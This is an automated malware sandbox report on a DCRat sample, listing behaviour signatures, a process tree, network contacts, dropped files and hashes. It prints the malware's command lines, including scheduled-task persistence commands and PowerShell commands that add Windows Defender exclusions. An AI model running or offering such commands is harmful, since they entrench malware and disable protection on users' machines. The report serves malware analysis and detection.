Analysis Overview
SHA256
b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0
Threat Level: Known bad
The file JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0 was found to be: Known bad.
Malicious Activity Summary
DCRat payload
Process spawned unexpected child process
DcRat
Dcrat family
DCRat payload
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops file in Program Files directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-30 02:14
Signatures
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Dcrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-30 02:14
Reported
2024-12-30 02:16
Platform
win7-20240903-en
Max time kernel
144s
Max time network
139s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\providercommon\DllCommonsvc.exe | N/A |
| N/A | N/A | C:\providercommon\DllCommonsvc.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\7-Zip\e978f868350d50 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Windows Media Player\cmd.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\cmd.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Windows Media Player\ebf1f9fa8afd6d | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows NT\TableTextService\dllhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows NT\TableTextService\5940a34987c991 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\7-Zip\powershell.exe | C:\providercommon\DllCommonsvc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\WmiPrvSE.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\24dbde2999530e | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\Tasks\conhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\Tasks\088424020bedd6 | C:\providercommon\DllCommonsvc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\providercommon\1zu9dW.bat" "
C:\providercommon\DllCommonsvc.exe
"C:\providercommon\DllCommonsvc.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Media Player\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\providercommon\lsm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\providercommon\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\providercommon\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Default\NetHood\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default\NetHood\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Users\Default\NetHood\services.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\cmd.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\lsm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\services.exe'
C:\providercommon\DllCommonsvc.exe
"C:\providercommon\DllCommonsvc.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\powershell.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\powershell.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\powershell.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\Tasks\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Tasks\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Windows\Tasks\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\Program Files\7-Zip\powershell.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\7-Zip\powershell.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\powershell.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\WmiPrvSE.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\explorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\TableTextService\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Tasks\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\powershell.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oiLsI5McyI.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\raSqT8qddO.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jkzlbVqk90.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\z7AIE64VZ5.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\76lQa6YaxV.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QqrgVo7Q94.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F82V1kRox2.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LabqbH8bfv.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2wrSnsL5gc.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WtQmBjXbDh.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\D6YKtyItKL.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eTpA0L9dlX.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
Files
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe
| MD5 | 8088241160261560a02c84025d107592 |
| SHA1 | 083121f7027557570994c9fc211df61730455bb5 |
| SHA256 | 2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1 |
| SHA512 | 20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478 |
C:\providercommon\1zu9dW.bat
| MD5 | 6783c3ee07c7d151ceac57f1f9c8bed7 |
| SHA1 | 17468f98f95bf504cc1f83c49e49a78526b3ea03 |
| SHA256 | 8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322 |
| SHA512 | c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8 |
C:\providercommon\DllCommonsvc.exe
| MD5 | bd31e94b4143c4ce49c17d3af46bcad0 |
| SHA1 | f8c51ff3ff909531d9469d4ba1bbabae101853ff |
| SHA256 | b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63 |
| SHA512 | f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394 |
memory/2772-13-0x0000000000F30000-0x0000000001040000-memory.dmp
memory/2772-14-0x0000000000240000-0x0000000000252000-memory.dmp
memory/2772-15-0x0000000000260000-0x000000000026C000-memory.dmp
memory/2772-16-0x0000000000250000-0x000000000025C000-memory.dmp
memory/2772-17-0x00000000003F0000-0x00000000003FC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 84c43e122c93dd25ec69d138c0fa5605 |
| SHA1 | 56d44cf56a7efa1dc8cd4d4eea11c85f2441a88d |
| SHA256 | 1df1215850a195be32d0c76ac2df5eab071a08b5e408bc5fabad89f191a292c9 |
| SHA512 | 1047f54c9218020fff38990f8a54ca8b14ddb9387060250fd5d1701ff8f2c8b191a06620195ee40a733cecd2f8e4c92cbc4fb9f6f52e8f999fa90789db5bf07b |
memory/1976-43-0x00000000023D0000-0x00000000023D8000-memory.dmp
memory/1976-37-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\oiLsI5McyI.bat
| MD5 | 16d3cdf819fb382f6c683381076724f8 |
| SHA1 | 9f47aae25e4ed10d823f92c1b0779c23de0415da |
| SHA256 | 56892492b289b0a3237d54cfdccf4f142e077b8eaf4e8560ce0e9cc34a755de8 |
| SHA512 | 86ac754c78b07e79b2bf2ef1e8d5d2575c3783eb19f023fa8569c5eb80c3b71b34e41e53adb50c4d89cdd4f1a1595a13ec4f1ab2bbf598a952fb69eaf2aec011 |
memory/2568-89-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
memory/2568-84-0x000000001B760000-0x000000001BA42000-memory.dmp
memory/632-123-0x0000000000E10000-0x0000000000F20000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab5EF4.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar5F06.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\raSqT8qddO.bat
| MD5 | 02b1b942132f258a8009c011fd791dcd |
| SHA1 | 24383b36a1598d420aa90a197b653104950e1303 |
| SHA256 | 830280d38ee2ba72e77cb2f53fd73b7117b9cd008f6e04c3b9920563199ce248 |
| SHA512 | ccf1177d6d5d82727dee2718014f9055f151e9aa91b47975f1fa5c9c9c6e9c1a8770cf4cbdae84b5581413bd1c18153e8e6add1e0c1356a2bdd9a83ccbd4f07f |
